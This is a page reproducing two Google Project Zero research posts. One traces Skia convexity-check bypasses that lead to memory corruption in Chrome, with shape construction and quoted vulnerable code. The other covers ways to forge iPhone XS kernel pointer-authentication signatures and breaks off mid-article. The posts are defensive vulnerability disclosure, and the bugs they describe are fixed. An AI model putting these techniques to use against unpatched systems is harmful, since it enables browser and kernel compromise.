Project Zero

Syndikovat obsah
News and updates from the Project Zero team at Google
Aktualizace: 20 min 32 sek zpět

The Curious Case of Convexity Confusion

5 Únor, 2019 - 19:08
Posted by Ivan Fratric, Google Project Zero
Intro
Some time ago, I noticed a tweet about an externally reported vulnerability in Skia graphics library (used by Chrome, Firefox and Android, among others). The vulnerability caught my attention for several reasons:
Firstly, I looked at Skia before within the context of finding precision issues, and any bugs in the code I already looked at instantly evoke the “What did I miss?” question in my head.
Secondly, the bug was described as a stack-based buffer overflow, and you don’t see many bugs of this type anymore, especially in web browsers.
And finally, while the bug itself was found by fuzzing and didn’t contain much in the sense of root cause analysis, a part of the fix involved changing the floating point precision from single to double which is something I argued against in the previous blog post on precision issues in graphics libraries.
So I wondered what the root cause was and if the patch really addressed it, or if other variants could be found. As it turned out, there were indeed other variants, resulting in stack and heap out-of-bounds writes in the Chrome renderer.
Geometry for exploit writers
To understand what the issue was, let’s quickly cover some geometry basics we’ll need later. This is all pretty basic stuff, so if you already know some geometry, feel free to skip this section.
A convex polygon is a polygon with a following property: you can take any two points inside the polygon, and if you connect them, the resulting line will be entirely contained within the polygon. A concave polygon is a polygon that is not convex. This is illustrated in the following images:
Image 1: An example of a convex polygon
Image 2: An example of a concave polygon
A polygon is monotone with respect to the Y axis (also called y-monotone) if every horizontal line intersects it at most twice. Another way to describe a y-monotone polygon is: if we traverse the points of the polygon from its topmost to its bottom-most point (or the other way around), the y coordinates of the points we encounter are always going to decrease (or always increase) but never alternate directions. This is illustrated by the following examples:
Image 3: An example of a y-monotone polygon
Image 4: An example of a non-y-monotone polygon

A polygon can also be x-monotone if every vertical line intersects it at most twice. A convex polygon is both x- and y-monotone, but the inverse is not true: A monotone polygon can be concave, as illustrated in Image 3.
All of the concepts above can easily be extended to other curves, not just polygons (which are made entirely from line segments).
A polygon can be transformed by transforming all of its points. A so-called affine transformation is a combination of scaling, skew and translation (note that affine transformation also includes rotation because rotation can be expressed as a combination of scale and skew). Affine transformation has a property that, when it is used to transform a convex shape, the resulting shape must also be convex.
For the readers with a basic knowledge of linear algebra: a transformation can be represented in the form of a matrix, and the transformed coordinates can be computed by multiplying the matrix with a vector representing the original coordinates. Transformations can be combined by multiplying matrices. For example, if you multiply a rotation matrix and a translation matrix, you’ll get a transformation matrix that includes both rotation and translation. Depending on the multiplication order, either rotation or translation is going to be applied first.
The bug
Back to the bug: after analyzing it, I found out that it was triggered by a malformed RRect (a rectangle with curved corners where the user can specify a radius for each corner). In this case, tiny values were used as RRect parameters which caused precision issues when the RRect was converted into a path object (a more general shape representation in Skia which can consist of both line and curve segments). The result of this was, after the RRect was converted to a path and transformed, the resulting shape didn’t look like a RRect at all - the resulting shape was concave.
At the same time Skia assumes that every RRect must be convex and so, when the RRect is converted to a path, it sets the convexity attribute on the path to kConvex_Convexity (for RRects this happens in a helper class SkAutoPathBoundsUpdate).
Why is this a problem? Because Skia has different drawing algorithms, some of which only work for convex paths. And, unfortunately, using algorithms for drawing convex paths when the path is concave can result in memory corruption. This is exactly what happened here.
Skia developers fixed the bug by addressing RRect-specific computations: they increased the precision of some calculations performed when converting RRects to paths and also made sure that any RRect corner with a tiny radius would be treated as if the radius is 0. Possibly (I haven’t checked), this makes sure that converting RRect to a path won’t result in a concave shape.
However, another detail caught my attention:
Initially, when the RRect was converted into a path, it might have been concave, but the concavities were so tiny that they wouldn’t cause any issues when the path was rendered. At some point the path was transformed which caused the concavities to become more pronounced (the path was very clearly concave at this point). And yet, the path was still treated as convex. How could that be?
The answer: The transformation used was an affine transform, and Skia respects the mathematical property that transforming a shape with an affine transform can not change its convexity, and so, when using an affine transform to transform a path, it copies the convexity attribute to the resulting path object.
This means: if we can convince Skia that a path is convex, when in reality it is not, and if we apply any affine transform to the path, the resulting path will also be treated as convex. The affine transform can be crafted so that it enlarges, rotates and positions concavities so that, once the convex drawing algorithm is used on the path, memory corruption issues are triggered.
Additionally (untested) it might be possible that, due to precision errors, computing a transformation itself might introduce tiny concavities when there were none previously. These concavities might then be enlarged in subsequent path transformations.
Unfortunately for computational geometry coders everywhere, accurately determining whether a path is convex or not in floating point precision (regardless if single or double floating point precision is used) is very difficult / almost impossible to do. So, how does Skia do it? Convexity computations in Skia happen in the Convexicator class, where Skia uses several criteria to determine if a path is convex:
  • It traverses a path and computes changes of direction. For example, if we follow a path and always turn left (or always turn right), the path must be convex.

  • It checks if a path is both x- and y-monotone

When analyzing this Convexicator class, I noticed two cases where a concave paths might pass as convex:
  1. As can be seen here, any pair of points for which the squared distance does not fit in a 32-bit float (i.e. distance between the points smaller than ~3.74e-23) will be completely ignored. This, of course, includes sequences of points which form concavities.

  1. Due to tolerances when computing direction changes (e.g here and here) even concavities significantly larger than 3.74e-23 can easily passing the convexity check (I experimented with values around 1e-10). However, such concavities must also pass the x- and y-monotonicity check.

Note that, in both cases, a path needs to have some larger edges (for which direction can be properly computed) in order to be declared convex, so just having a tiny path is not sufficient. Fortunately, a line is considered convex by Skia, so it is sufficient to have a tiny concave shape and a single point at a sufficient distance away from it for a path to be declared convex.
Alternately, by combining both issues above, one can have tiny concavities along the line, which is a technique I used to create paths that are both small and clearly concave when transformed (Note: the size of the path is often a factor when determining which algorithms can handle which paths).
To make things clearer, let’s see an example of bypassing the convexity check with a polygon that is both x- and y- monotone. Consider the polygon in Image 5 (a) and imagine that the part inside the red circle is much smaller than depicted. Note that this polygon is concave, but it is also both x-monotone and y-monotone. Thus, if the concavity depicted in the red circle is sufficiently small, the polygon is going to be declared convex.
Now, let’s see what we can do with it by applying an affine transform - firstly, we can rotate it and make it non-y-monotone as depicted in Image 5 (b). Having a polygon that is not y-monotone will be very important for triggering memory corruption issues later.
Secondly, we can scale (enlarge) and translate the concavity to fill the whole drawing area, and when the concavity is intersected with the drawing area we’ll end up with something like depicted in Image 5 (c), in which the polygon is clearly concave and the concavity is no longer small.
(a)
(b)
(c)
Image 5: Bypassing the convexity check with a monotone polygon
The walk_convex_edges algorithm
Now that we can bypass the convexity check in various ways, let’s see how it can lead to problems. To understand this, let’s first examine how Skia's algorithm for drawing (filling) convex paths works (code here). Let’s consider an example in Image 6 (a). The first thing Skia does is, it extracts polygon (path) lines (edges) and sorts them according to the coordinates of the topmost point. The sorting order is top-to-bottom, and if two points have the same y coordinate, then the one with a smaller x coordinate goes first. This has been done for the polygon in Image 6 (a) and the numbers next to the edges depict their order. The bottommost edge is ignored because it is fully horizontal and thus not needed (you’ll see why in a moment).
Next, the edges are traversed and the area between them drawn. First, the first two edges (edges 1 and 2) are taken and the area between them is filled from top to bottom - this is the red area in Image 6 (b). After this, edge 1 is “done” and it is replaced by the next edge - edge 3. Now, area between edge 2 and edge 3 is filled (orange area). Next, edge 2 is “done” and is replaced by the next in line: edge 4. Finally, the area between edges 3 and 4 is rendered. Since there are no more edges, the algorithm stops.

(a)
(b)
Image 6: Skia convex path filling algorithm
Note that, in the implementation, the code for rendering areas where both edges are vertical (here) is different than the code for rendering areas where at least one edge is at an angle (here). In the first case, the whole area is rendered in a single call to blitter->blitRect() while in the second case, the area is rendered line-by-line and for each line blitter->blitH() is called. Of special interest here is the local_top variable, essentially keeping track of the next y coordinate to fill. In the case of drawing non-vertical edges, this is simply incremented for every line drawn. In case of vertical lines (drawing a rectangle), after the rectangle is drawn, local_top is set based on the coordinates of the current edge pair. This difference in behavior is going to be useful later.
One interesting observation about this algorithm is that it would not only work correctly for convex paths - it would work correctly for all paths that are y-monotone. Using it for y-monotone paths would also have another benefit: Checking if a path is y-monotone could be performed faster and more accurately than checking if a path is convex.
Variant 1
Now, let’s see how drawing concave paths using this algorithm can lead to problems. As the first example, consider the polygon in Image 7 (a) with the edge ordering marked.
(a)
(b)
Image 7: An example of a concave path that causes problem in Skia if rendered as convex
Image 7 (b) shows how the shape is rendered. First, a large red area between edges 1 and 2 is rendered. At this point, both edges 1 and 2 are done, and the orange rectangular area between areas 3 and 4 is rendered next. The purpose of this rectangular area is simply to reset the local_top variable to its correct value (here), otherwise local_top would just continue increasing for every line drawn. Next, the green area between edges 3 and 5 is drawn - and this causes problems. Why?
Because Skia expects to always draw pixels in a top-to-bottom, left-to right order, e.g. point (x, y) = (1, 1) is always going to be drawn before (1, 2) and (1, 1) is also going to be always drawn before (2, 1).
However, in the example above, the area between edges 1 and 2 will have (partially) the same y values as the area between edges 3 and 5. The second area is going to be drawn, well, second, and yet it contains a subset of same y coordinates and lower x coordinates than the first region.
Now let’s see how this leads to memory corruption. In the original bug, a concave (but presumed convex) path was used as a clipping region (every subsequent draw call draws only inside the clipping region). When setting a path as a clipping region, it also gets “drawn”, but instead of drawing pixels on the screen, they just get saved so they could be intersected with what gets drawn afterwards. The pixels are saved in SkRgnBuilder::blitH and actually, individual pixels aren't saved but instead the entire range of pixels (from x to x + width at height y) gets stored at once to save space. These ranges - you guessed it - also depend on the correct drawing order as can be seen here (among other places).
Now let’s see what happens when a second path is drawn inside a clipping region with incorrect ordering. If antialiasing is turned on when drawing the second path, SkRgnClipBlitter::blitAntiH gets called for every range drawn. This function needs to intersect the clip region ranges with the range being drawn and only output the pixels that are present in both. For that purpose, it gets the clipping ranges that intersect the line being drawn one by one and processes them. SkRegion::Spanerator::next is used to return the next clipping range.
Let’s assume the clipping region for the y coordinate currently drawn has the ranges [start x, end x] = [10, 20] and [0, 2] and the line being drawn is [15,16]. Let’s also consider the following snippet of code from SkRegion::Spanerator::next:
   if (runs[0] >= fRight) {        fDone = true;        return false;    }
   SkASSERT(runs[1] > fLeft);
   if (left) {        *left = SkMax32(fLeft, runs[0]);    }    if (right) {        *right = SkMin32(fRight, runs[1]);    }    fRuns = runs + 2;    return true;
where left and right are the output pointers, fLeft and fRight are going to be left and right x value of the line being drawn (15 and 16 respectively), while runs is a pointer to clipping region ranges that gets incremented for every iteration. For the first clipping line [10, 20] this is going to work correctly, but let’s see what happens for the range [0, 2]. Firstly, the part
   if (runs[0] >= fRight) {        fDone = true;        return false;    }
is supposed to stop the algorithm, but due to incorrect ordering, it does not work (16 >= 0 is false). Next, left is computed as Max(15, 0) = 15 and right as Min(16, 2) = 2. Note how left is larger than right. This is going to result in calling SkAlphaRuns::Break with a negative count argument on the line,
      SkAlphaRuns::Break((int16_t*)runs, (uint8_t*)aa, left - x, right - left);
which then leads to out-of-bounds write on the following lines in SkAlphaRuns::Break:
       x = count;        ...        alpha[x] = alpha[0];
Why did this result in out-of-bounds write on the stack? Because, in the case of drawing only two pixels, the range arrays passed to SkRgnClipBlitter::blitAntiH and subsequently SkAlphaRuns::Break are allocated on stack in SkBlitter::blitAntiH2 here.
Triggering the issue in a browser
This is great - we have a stack out-of-bounds write in Skia, but can we trigger this in Chrome? In general, in order to trigger the bug, the following conditions must be met:
  1. We control a path (SkPath) object
  2. Something must be done to the path object that computes its convexity
  3. The same path must be transformed and filled / set as a clip region

My initial idea was to use a CanvasRenderingContext2D API and render a path twice: once without any transform just to establish its convexity and a second time with a transformation applied to the CanvasRenderingContext2D object.
Unfortunately, this approach won’t work - when drawing a path, Skia is going to copy it before applying a transformation, even if there is effectively no transformation set (the transformation matrix is an identity matrix). So the convexity property is going to be set on a copy of the path and not the one we get to keep the reference to.
Additionally, Chrome itself makes a copy of the path object when calling any canvas functions that cause a path to be drawn, and all the other functions we can call with a path object as an argument do not check its convexity.
However, I noticed Chrome canvas still draws my convex/concave paths incorrectly - even if I just draw them once. So what is going on? As it turns out, when drawing a path using Chrome canvas, the path won’t be drawn immediately. Instead, Chrome just records the draw path operation using RecordPaintCanvas and all such draw operations will be executed together, at a later time. When a DrawPathOp object (representing a path drawing operation) is created, among other things, it is going to check if the path is “slow”, and one of the criteria for this is path convexity:
int DrawPathOp::CountSlowPaths() const {  if (!flags.isAntiAlias() || path.isConvex())    return 0;  …}
All of this happens before the path is transformed, so we seemingly have a perfect scenario: We control a path, its convexity is checked, and the same path object later gets transformed and rendered.
The second problem with canvas is that, in the previously described approach to converting the issue to memory corruption, we relied on SkRgnBuilder, which is only used when a clip region has antialiasing turned off, while everything in Chrome canvas is going to be drawn with antialiasing on. Chrome also implements the OffscreenCanvas API which sets clip antialiasing to off (I’m not sure if this is deliberate or a bug), but OffscreenCanvas does not use RecordPaintCanvas and instead draws everything immediately.
So the best way forward seemed to be to find some other variants of turning convexity issues into memory corruption, ones that would work with antialiasing on for all operations.
Variant 2
As it happens, Skia implements three different algorithms for path drawing with antialiasing on and one of these (SkScan::SAAFillPath, using supersampled antialiasing) uses essentially the same filling algorithm we analyzed before. Unfortunately, this does not mean we can get to the same buffer overflow as before - as mentioned before SkRgnBuilder / SkRgnClipBlitter are not used with antialiasing on. However, we have other options.
If we simply fill the path (no clip region needed this time) with the correct algorithm, SuperBlitter::blitH is going to be called without respecting the top-to-bottom, left-to-right drawing order. SuperBlitter::blitH calls SkAlphaRuns::add and as the last argument, it passes the rightmost x coordinate we have drawn so far. This is subtracted from the currently drawn x coordinate on the line:
       x -= offsetX;
And if x is smaller than something we drew already (for the same y coordinate) it becomes negative. This is of course exactly what happens when drawing pixels out of Skia expected order.
The result of this is calling SkAlphaRuns::Break with a negative “x” argument. This skips the entire first part of the function (the “while (x > 0)” loop), and continues to the second part:
       runs = next_runs;        alpha = next_alpha;        x = count;
       for (;;) {            int n = runs[0];            SkASSERT(n > 0);
           if (x < n) {                alpha[x] = alpha[0];                runs[0] = SkToS16(x);                runs[x] = SkToS16(n - x);                break;            }            x -= n;            if (x <= 0) {                break;            }            runs += n;            alpha += n;        }

Here, x gets overwritten with count, but the problem is that runs[0] is not going to be initialized (the first part of the function is supposed to initialize it), so in
       int n = runs[0];
an uninitialized variable gets read into n and is used as an offset into arrays, which can result in both out-of-bounds read and out-of-bounds write when the following lines are executed:
       runs += n;        alpha += n;
       alpha[x] = alpha[0];        runs[0] = SkToS16(x);        runs[x] = SkToS16(n - x);
The shape needed to trigger this is depicted in image 8 (a).
(a)
(b)
Image 8: Shape used to trigger variant 2 in Chrome

This shape is similar to the one previously depicted, but there are some differences, namely:
  • We must render two ranges for the same y coordinate immediately one after another, where the second range is going to be to the left of the first range. This is accomplished by making the rectangular area between edges 3 and 4 (orange in Image 8 (b)) less than a pixel wide (so it does not in fact output anything) and making the green area between edges 5 and 6 (green in the image) only a single pixel high.

  • The second range for the same y must not start at x = 0. This is accomplished by edge 5 ending a bit away from the left side of the image bounds.

This variant can be triggered in Chrome by simply drawing a path - the poc can be seen here.
Variant 3
Uninitialized variable bug in a browser is nice, but not as nice as a stack out-of-bounds write, so I looked for more variants. For the next and final one, the path we need is a bit more complicated and can be seen in Image 9 (a) (note that the path is self-intersecting).
(a)
(b)
Image 9: A shape used to trigger a stack buffer overflow in Chrome
Let’s see what happens in this one (assume the same drawing algorithm is used as before): First, edges 1, 2, 3 and 4 are handled. This part is drawn incorrectly (only red and orange areas in Image 9 (b) are filled), but the details aren’t relevant for triggering the bug. For now, just note that edges 2 and 4 terminate at the same height, so when they are done, edges 2 and 4 are both replaced with edges 5 and 6. The purpose of edges 5 and 6 is once again to reset the local_top variable - it will be set to the height shown as the red dotted line in the image. Now, edge 5 and 6 will both get replaced with edges 7 and 8 - and here is the issue: Edges 7 and 8 are not going to be drawn for y coordinates between the green and blue line, as they are supposed to. Instead, they are going to be rendered all the way from the red line to the blue line. Note the very low steepness of edges 7 and 8 - for every line, the x coordinates to draw to are going to be significantly increased and, given that they are going to be drawn in a larger number of iterations than intended, the x coordinate will eventually spill past the image bounds.
This causes a stack out-of-bounds write if a path is drawn using SkScan::SAAFillPath algorithm with MaskSuperBlitter. MaskSuperBlitter can only handle very small paths (up to 32x32 pixels) and contains a fixed-size buffer that is going to be filled with 8-bit opacity for each pixel of the path region. Since MaskSuperBlitter is a local variable in SkScan::SAAFillPath, the (fixed-size) buffer is going to be allocated on the stack. When the path above is drawn, there aren’t any bounds checks on the opacity buffer (there are only debug asserts here and here), which leads to an out-of bounds write on the stack. Specifically (due to how opacity buffer works) we can increment values on the stack past the end of the buffer by a small amount.
This variant is again triggerable in Chrome by simply drawing a path to the Canvas and gives us a pretty nice primitive for exploitation - note that this is not a linear overflow and offsets involved can be controlled by the slope of edges 7 and 8. The PoC can be seen here - most of it is just setting up the path coordinates so that the path is initially declared convex and at the same time small enough so that MaskSuperBlitter can render it.
How to make the shape needed to trigger the bug appear convex to Skia but also fit in 32x32 pixels? Note that the shape is already x-monotone. Now assume we squash it in the y direction until it becomes (almost) a line lying on the x axis. It is still not y-monotone because there are tiny shifts in y direction along the line - but if we skew (or rotate) it just a tiny amount, so that it is no longer parallel to the x axis, it also becomes y-monotone. The only parts we can’t make monotone are vertical edges (edges 5 and 6), but if you squashed the shape sufficiently they become so short that their square length does not fit in a float and are ignored by the Skia convexity test. This is illustrated in Image 10. In reality these steps need to be followed in reverse, as we start with a shape that needs to pass the Skia convexity test and then transform it to the shape depicted in Image 9.
(a)
(b)
(c)
Image 10: Making the shape from Image 9 appear convex, (a) original shape, (b) shape after y-scale, (c) shape after y-scale rotation

On fixing the issue
Initially, Skia developers attempted to fix the issue by not propagating convexity information after the transformation, but only in some cases. Specifically, the convexity was still propagated if the transformation consisted only of scale and translation. Such a fix is insufficient because very small concavities (where square distance between points is too small to fit in a 32-bit float) could still be enlarged using only scale transformation and could form shapes that would trigger memory corruption issues.
After talking to the Skia developers, a stronger patch was created, modifying the convex drawing algorithm in a way that passing concave shapes to it won’t result in memory corruption, but rather in returning from the draw operation early. This patch shipped, along with other improvements, in Chrome 72.
It isn’t uncommon that an initial fix for a vulnerability is insufficient. But the saving grace for Skia, Chrome and most open source projects is that the bug reporter can see the fix immediately when it’s created and point out the potential drawbacks. Unfortunately, this isn’t the case for many closed-source projects or even open-sourced projects where the bug fixing process is opaque to the reporter, which caused mishaps in the past. However, regardless of the vendor, we at Project Zero are happy to receive information on the fixes early and comment on them before they are released to the public.
Conclusion
There are several things worth highlighting about this bug. Firstly, computational geometry is hard. Seriously. I have some experience with it and, while I can’t say I’m an expert I know that much at least. Handling all the special cases correctly is a pain, even without considering security issues. And doing it using floating point arithmetic might as well be impossible. If I was writing a graphics library, I would convert floats to fixed-point precision as soon as possible and wouldn’t trust anything computed based on floating-point arithmetic at all.
Secondly, the issue highlights the importance of doing variant analysis - I discovered it based on a public bug report and other people could have done the same.
Thirdly, it highlights the importance of defense-in-depth. The latest patch makes sure that drawing a concave path with convex path algorithms won’t result in memory corruption, which also addresses unknown variants of convexity issues. If this was implemented immediately after the initial report, Project Zero would now have one blog post less :-)
Kategorie: Hacking & Security

Examining Pointer Authentication on the iPhone XS

1 Únor, 2019 - 20:25
Posted by Brandon Azad, Project Zero
In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing.ARMv8.3-A Pointer AuthenticationAmong the most exciting security features introduced with ARMv8.3-A is Pointer Authentication, a feature where the upper bits of a pointer are used to store a Pointer Authentication Code (PAC), which is essentially a cryptographic signature on the pointer value and some additional context. Special instructions have been introduced to add an authentication code to a pointer and to verify an authenticated pointer's PAC and restore the original pointer value. This gives the system a way to make cryptographically strong guarantees about the likelihood that certain pointers have been tampered with by attackers, which offers the possibility of greatly improving application security.
(Proper terminology dictates that the security feature is called Pointer Authentication while the cryptographic signature that is inserted into the unused bits of a pointer is called the Pointer Authentication Code, or PAC. However, popular usage has already confused these terms, and it is common to see Pointer Authentication referred to as PAC. Usually this usage is unambiguous, so for brevity I will often refer to Pointer Authentication as PAC as well.)
There are many great articles describing Pointer Authentication, so I'll only go over the rough details here. Interested readers can refer to Qualcomm's whitepaper, Mark Rutland's slides from the 2017 Linux Security Summit, this LWN article by Jonathan Corbet, and the ARM A64 Instruction Set Architecture for further details.
The key insight that makes Pointer Authentication viable is that, although pointers are 64 bits, most systems have a virtual address space that is much smaller, which leaves unused bits in a pointer that can be used to store additional data. In the case of Pointer Authentication, these bits will be used to store a short authentication code over both the original 64-bit pointer value and a 64-bit context value.
Systems are allowed to use an implementation-defined algorithm to compute PACs, but the standard recommends the use of a block cipher called QARMA. According to the whitepaper, QARMA is "a new family of lightweight tweakable block ciphers" designed specifically for pointer authentication. QARMA-64, the variant used in the standard, takes as input a secret 128-bit key, a 64-bit plaintext value (the pointer), and a 64-bit tweak (the context), and produces as output a 64-bit ciphertext. The truncated ciphertext becomes the PAC that gets inserted into the unused extension bits of the pointer.
The architecture provides for 5 secret 128-bit Pointer Authentication keys. Two of these keys, APIAKey and APIBKey, are used for instruction pointers. Another two, APDAKey and APDBKey, are used for data pointers. And the last key, APGAKey, is a special "general" key that is used for signing larger blocks of data with the PACGA instruction. Providing multiple keys allows for some basic protection against pointer substitution attacks, in which one authenticated pointer is substituted with another.
The values of these keys are set by writing to special system registers. The registers containing the Pointer Authentication keys are inaccessible from EL0, meaning that a userspace process cannot read or change them. However, the hardware provides no other key management features: it's up to the code running at each exception level to manage the keys for the next lower exception level.
ARMv8.3-A introduces three new categories of instructions for dealing with PACs:
  • PAC* instructions generate and insert the PAC into the extension bits of a pointer. For example, PACIA X8, X9 will compute the PAC for the pointer in register X8 under the A-instruction key, APIAKey, using the value in X9 as context, and then write the resulting PAC'd pointer back in X8. Similarly, PACIZA is like PACIA except the context value is fixed to 0.
  • AUT* instructions verify a pointer's PAC (along with the 64-bit context value). If the PAC is valid, then the PAC is replaced with the original extension bits. Otherwise, if the PAC is invalid (indicating that this pointer was tampered with), then an error code is placed in the pointer's extension bits so that a fault is triggered if the pointer is dereferenced. For example, AUTIA X8, X9 will verify the PAC'd pointer in X8 under the A-instruction key using X9 as context, writing the valid pointer back to X8 if successful and writing an invalid value otherwise.
  • XPAC* instructions remove a pointer's PAC and restore the original value without performing verification.

In addition to these general Pointer Authentication instructions, a number of specialized variants were introduced to combine Pointer Authentication with existing operations:
  • BLRA* instructions perform a combined authenticate-and-branch operation: the pointer is validated and then used as the branch target for BLR. For example, BLRAA X8, X9 will authenticate the PAC'd pointer in X8 under the A-instruction key using X9 as context and then branch to the resulting address.
  • LDRA* instructions perform a combined authenticate-and-load operation: the pointer is validated and then data is loaded from that address. For example, LDRAA X8, X9 will validate the PAC'd pointer X9 under the A-data key using a context value of 0 and then load the 64-bit value at the resulting address into X8.
  • RETA* instructions perform a combined authenticate-and-return operation: the link register LR is validated and then RET is performed. For example, RETAB will verify LR using the B-instruction key and then return.
A known limitation: signing gadgetsBefore we start our analysis of PAC, I should mention a known limitation: PAC can be bypassed if an attacker with read/write access can coerce the system into executing a signing gadget. Signing gadgets are instruction sequences that can be used to sign arbitrary pointers. For example, if an attacker can trigger the execution of a function that reads a pointer from memory, adds a PAC, and writes it back, then they can use this function as a signing oracle to forge PACs for arbitrary pointers.Weaknesses against kernel attackersAs discussed in the Qualcomm whitepaper, ARMv8.3 Pointer Authentication was designed to provide some protection even against attackers with arbitrary memory read or arbitrary memory write capabilities. But it's important to understand the limitations of the design under the attack model we're considering: a kernel attacker who already has read/write and is looking to execute arbitrary code by forging PACs on kernel pointers.
Looking at the specification, I identified three potential weaknesses in the design when protecting against kernel attackers with read/write: reading the PAC keys from memory, signing kernel pointers in userspace, and signing A-key pointers using the B-key (or vice versa). We'll discuss each in turn.Reading PAC keys from kernel memoryFirst let's consider what is perhaps the most obvious type of attack: just reading the PAC keys from kernel memory and then manually computing PACs for arbitrary kernel pointers. Here's an excerpt from the subsection of the whitepaper on attackers who can read arbitrary memory:
Pointer Authentication is designed to resist memory disclosure attacks. The PAC is computed using a cryptographically strong algorithm, so reading any number of authenticated pointers from memory would not make it easier to forge pointers.
The keys are stored in processor registers, and these registers are not accessible from usermode (EL0). Therefore, a memory disclosure vulnerability would not help extract the keys used for PAC generation.
While true, this description applies specifically to attacking a userspace program, not attacking the kernel itself. Recent iOS devices do not appear to be running a hypervisor (EL2) or secure monitor (EL3), meaning the kernel running at EL1 must manage its own PAC keys. And since the system registers that store them during normal operation will be cleared when the core goes to sleep, this means that the PAC keys must at some point be stored in kernel memory. Thus an attacker with kernel memory access could probably read the keys and use them to manually compute authentication codes for arbitrary pointers.
Of course, this approach assumes that we know what algorithm is being used under the hood to generate PACs so that we can implement it ourselves in userspace. Knowing Apple, there's a good chance they're use a custom algorithm in place of QARMA. If that's the case, then knowing the PAC keys wouldn't be sufficient to forge PACs: either we'd have to reverse engineer the silicon and determine the algorithm, or we'd have to find a way to reuse the existing machinery to forge pointers on our behalf.Cross-EL PAC forgeriesAlong the latter line of analysis, one possible way to do that would be to forge PACs for kernel pointers by executing the corresponding PAC* instructions in userspace. While this may sound naive, there are a few reasons this could work.
While unlikely, it's possible that Apple has decided to use the same PAC keys for EL0 and EL1, in which case we could forge a kernel PACIA signature (for example) by literally executing a PACIA instruction on the kernel pointer from userspace. You can see that the ARM pseudocode describing the implementation of PAC* instructions makes no distinction between whether this instruction was executed at EL0 or EL1.
Here's the pseudocode for AddPACIA(), which describes the implementation of PACIA-like instructions:
// AddPACIA()// ==========// Returns a 64-bit value containing X, but replacing the pointer// authentication code field bits with a pointer authentication code, where the// pointer authentication code is derived using a cryptographic algorithm as a// combination of X, Y, and the APIAKey_EL1.
bits(64) AddPACIA(bits(64) X, bits(64) Y)    boolean TrapEL2;    boolean TrapEL3;    bits(1)  Enable;    bits(128) APIAKey_EL1;
   APIAKey_EL1 = APIAKeyHi_EL1<63:0>:APIAKeyLo_EL1<63:0>;
   case PSTATE.EL of        when EL0            boolean IsEL1Regime = S1TranslationRegime() == EL1;            Enable = if IsEL1Regime then SCTLR_EL1.EnIA else SCTLR_EL2.EnIA;            TrapEL2 = (EL2Enabled() && HCR_EL2.API == '0' &&                       (HCR_EL2.TGE == '0' || HCR_EL2.E2H == '0'));            TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0';        when EL1            Enable = SCTLR_EL1.EnIA;            TrapEL2 = EL2Enabled() && HCR_EL2.API == '0';            TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0';        ...
   if Enable == '0' then return X;    elsif TrapEL2 then TrapPACUse(EL2);    elsif TrapEL3 then TrapPACUse(EL3);    else return AddPAC(X, Y, APIAKey_EL1, FALSE);
And here's the pseudocode implementation of AddPAC():
// AddPAC()// ========// Calculates the pointer authentication code for a 64-bit quantity and then// inserts that into pointer authentication code field of that 64-bit quantity.
bits(64) AddPAC(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data)    bits(64) PAC;    bits(64) result;    bits(64) ext_ptr;    bits(64) extfield;    bit selbit;    boolean tbi = CalculateTBI(ptr, data);    integer top_bit = if tbi then 55 else 63;
   // If tagged pointers are in use for a regime with two TTBRs, use bit<55> of    // the pointer to select between upper and lower ranges, and preserve this.    // This handles the awkward case where there is apparently no correct    // choice between the upper and lower address range - ie an addr of    // 1xxxxxxx0... with TBI0=0 and TBI1=1 and 0xxxxxxx1 with TBI1=0 and    // TBI0=1:    if PtrHasUpperAndLowerAddRanges() then        ...    else selbit = if tbi then ptr<55> else ptr<63>;
   integer bottom_PAC_bit = CalculateBottomPACBit(selbit);
   // The pointer authentication code field takes all the available bits in    // between    extfield = Replicate(selbit, 64);
   // Compute the pointer authentication code for a ptr with good extension bits    if tbi then        ext_ptr = ptr<63:56>:extfield<(56-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;    else        ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
   PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>);
   // Check if the ptr has good extension bits and corrupt the pointer    // authentication code if not;    if !IsZero(ptr<top_bit:bottom_PAC_bit>) && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then        PAC<top_bit-1> = NOT(PAC<top_bit-1>);
   // Preserve the determination between upper and lower address at bit<55>    // and insert PAC    if tbi then        result = ptr<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>;    else        result = PAC<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>;    return result;
Operationally, there are no significant differences between executing PACIA at EL0 and EL1, which means that if Apple has used the same PAC keys for both exception levels, we can simply execute PACIA in userspace to sign kernel pointers.
Of course, it seems highly unlikely that Apple has left such an obvious hole in their implementation. Even so, the symmetry between EL0 and EL1 means that we could potentially forge kernel PACIA signatures by reading the kernel's PAC keys, replacing the userspace PAC keys for one thread in our process with the kernel PAC keys, and then we could indeed forge kernel pointers by executing PACIA in userspace in that thread. This would be useful if Apple is using an unknown algorithm in place of QARMA, since we could reuse the existing signing machinery without having to reverse engineer it.Cross-key PAC forgeriesAnother symmetry that we could potentially leverage to produce PAC forgeries is between the different PAC keys: PACIA, PACIB, PACDA, and PACDB all reduce to the same implementation under the hood, just using different keys. Thus, if we can replace one PAC key with another, we can turn signing gadgets for one key into signing gadgets for another key.
This would be useful if, for example, the PAC algorithm is unknown and there is something that prevents us from setting the userspace PAC keys equal to the kernel PAC keys so that we can perform cross-EL forgeries. While this forgery strategy is much less powerful, since we'd need to rely on the existence of PAC signing gadgets (which are a known limitation of PAC), this technique would free us from the restriction that the signing gadget use the same key that we're trying to forge, potentially diversifying the set of available gadgets.Finding an entry point for kernel code executionNow that we have some theoretical ideas of how we might try and defeat PAC on A12 devices, let's look at the other end and figure out how we could use a PAC bypass to execute arbitrary code in the kernel.
